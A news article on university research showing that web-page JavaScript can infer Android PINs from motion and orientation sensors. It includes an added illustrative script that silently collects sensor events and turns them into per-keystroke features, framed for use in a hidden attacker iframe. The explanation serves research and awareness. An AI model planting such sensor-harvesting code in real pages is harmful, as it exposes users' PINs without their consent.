With each new generation of smartphone, manufacturers add more sensors to enhance the user’s experience, and more apps in turn ask for blanket permission to use them. This proliferation of sensors and permissions is creating serious privacy and security issues, as researchers at Newcastle University established with a new attack that can recover a user’s four-digit phone PIN 94 percent of the time (within three guesses) by measuring the output of an Android device’s motion and orientation sensors.
Modern mobile devices include a number of different sensors, such as accelerometers, GPS receivers, and many others. Lots of apps use these for legitimate purposes, including geolocation, measuring speed and direction, and sensing ambient light. But some apps and websites abuse these sensors to gather information about a user’s location and activities. In their paper, the Newcastle University researchers also report the results of a study that measured the public’s perception of the sensors in their mobile devices, and the result was consistent: people were not aware of the sensors on their phones and other devices. More importantly, they found that users are not concerned about these sensors.
The study surveyed more than 100 people and found that most of the sensors caused little or no concern for the majority of users, with the exception of fingerprint sensors. The results (seen below) show that most users are not much concerned about the risk posed by most of the sensors in their mobile devices.
The attack, implemented in a piece of JavaScript the researchers call PINlogger.js, relies on the output of several different sensors in a target Android device. It assumes that the victim is typing a digit-only PIN on an on-screen soft keyboard.
“Unlike similar works which have to gain the access through an installed app, our attack does not require any user permission. Instead, we assume that the user has loaded the malicious web content in the form of an iframe, or another tab while working with the mobile browser. At this point, the attack code has already started listening to the sensor sequences from the user’s interaction with the phone,” the paper says.
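To make the mechanism concrete, here is an added example of the page-side pipeline the quoted passage describes. It is not PINlogger.js or any code from the paper: the listener registration uses the standard `devicemotion`, `deviceorientation` and `touchstart` browser events, but the store layout, the burst-based touch detection, the window sizes, the feature set, and the sample stream are this example’s own assumptions, and the sensor data is constructed rather than captured from a phone. The point it shows is that no permission prompt stands between a loaded page (or iframe) and the sensor stream, and that a few lines turn that stream into per-keystroke feature vectors suitable for training a classifier.

```javascript
'use strict';

// Capture store: `motion` and `orientation` hold the sensor samples, `touches`
// the times of touch events (only available on a page the attacker controls,
// e.g. one used to collect labelled training data).
function createStore() {
  return { motion: [], orientation: [], touches: [] };
}

// Register the listeners. No permission prompt is involved; the events arrive
// as long as the page (or an iframe inside it) is loaded. Returns false when
// there is no window object, so the analysis functions can run offline.
function attachSensorListeners(win, store, now = () => Date.now()) {
  if (!win || typeof win.addEventListener !== 'function') return false;
  win.addEventListener('devicemotion', (e) => {
    const a = e.accelerationIncludingGravity || {};
    store.motion.push({ t: now(), ax: a.x, ay: a.y, az: a.z });
  });
  win.addEventListener('deviceorientation', (e) => {
    store.orientation.push({ t: now(), alpha: e.alpha, beta: e.beta, gamma: e.gamma });
  });
  win.addEventListener('touchstart', () => store.touches.push(now()), { passive: true });
  return true;
}

// Resting baseline of the stream: per-axis mean acceleration (m/s^2).
function baseline(stream) {
  const n = stream.length;
  const sum = stream.reduce(
    (s, p) => ({ ax: s.ax + p.ax, ay: s.ay + p.ay, az: s.az + p.az }),
    { ax: 0, ay: 0, az: 0 });
  return { ax: sum.ax / n, ay: sum.ay / n, az: sum.az / n };
}

// Example heuristic (not the paper's segmentation): a key tap shows up as a
// burst of samples whose deviation from the baseline exceeds `threshold`.
// Samples less than `gapMs` apart are grouped into one burst; the burst's
// centre time is the estimated moment of the tap. Against a real victim the
// attacker has no touch events from the PIN screen, so tap timing has to be
// recovered from the sensor stream like this.
function detectTouches(stream, threshold = 1.0, gapMs = 50) {
  const b = baseline(stream);
  const bursts = [];
  let cur = null;
  for (const p of stream) {
    const d = Math.hypot(p.ax - b.ax, p.ay - b.ay, p.az - b.az);
    if (d <= threshold) continue;
    if (cur && p.t - cur[cur.length - 1] <= gapMs) cur.push(p.t);
    else { cur = [p.t]; bursts.push(cur); }
  }
  return bursts.map((ts) => (ts[0] + ts[ts.length - 1]) / 2);
}

// Cut a window of samples around each tap time (window sizes are assumptions).
function segment(stream, touchTimes, beforeMs = 100, afterMs = 100) {
  return touchTimes.map((t0) =>
    stream.filter((p) => p.t >= t0 - beforeMs && p.t <= t0 + afterMs));
}

function stats(values) {
  const mean = values.reduce((a, v) => a + v, 0) / values.length;
  return { mean, min: Math.min(...values), max: Math.max(...values) };
}

// Per-segment feature vector (mean/min/max per axis): the kind of input a
// classifier is trained on. The paper's neural network is not reproduced here.
function featureVector(seg) {
  const f = {};
  for (const axis of ['ax', 'ay', 'az']) {
    const s = stats(seg.map((p) => p[axis]));
    f[`${axis}_mean`] = s.mean;
    f[`${axis}_min`] = s.min;
    f[`${axis}_max`] = s.max;
  }
  return f;
}

// Constructed 50 Hz motion stream, 1 s long: phone at rest (gravity on z) with
// two short tilts standing in for key taps at t = 200 ms and t = 600 ms.
function constructedStream() {
  const out = [];
  for (let t = 0; t < 1000; t += 20) {
    const p = { t, ax: 0, ay: 0, az: 9.8 };
    if (t >= 180 && t <= 220) p.ay = 2.0;
    if (t >= 580 && t <= 620) p.ax = -1.5;
    out.push(p);
  }
  return out;
}

// Full pipeline: find taps, cut windows, build one feature vector per tap.
function analyse(stream) {
  const touches = detectTouches(stream);
  return { touches, vectors: segment(stream, touches).map(featureVector) };
}

const store = createStore();
if (!attachSensorListeners(typeof window !== 'undefined' ? window : null, store)) {
  // Not in a browser: exercise the pipeline on the constructed stream instead.
  console.log(JSON.stringify(analyse(constructedStream()), null, 1));
}
```

In a browser, the same script dropped into a hidden iframe on an attacker page fills `store.motion` and `store.orientation` while the user does other things with the phone, which is the scenario the paper describes. Browsers have tightened this since the paper appeared: Safari on iOS 13 and later only delivers motion and orientation events after `DeviceMotionEvent.requestPermission()` is granted in response to a user gesture, and Chromium gates the events in cross-origin iframes behind Permissions Policy, so the example should be read as illustrating the mechanism rather than the current state of every browser.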
At the present time, there does not seem to be a solution to the problem. The paper does offer a suggestion: “Having control on granting access before opening a website and during working with it, in combination with a smart notification feature in the browser would probably achieve a balance between security and usability.” This is similar to the runtime permission prompts mobile apps already show before they can send the user notifications or use the user’s location.
Maryam Mehrnezhad, one of the paper’s authors, said via email that the problem will get more serious over time.
“When smart kitchens, smart homes, smart buildings, and smart cities are equipped with multiple sensor-enabled devices connected via IoT,” Mehrnezhad said, “these devices will be constantly sensing people and their surroundings and broadcasting this information. If sensors are not securely managed, the threat is going to be much bigger.”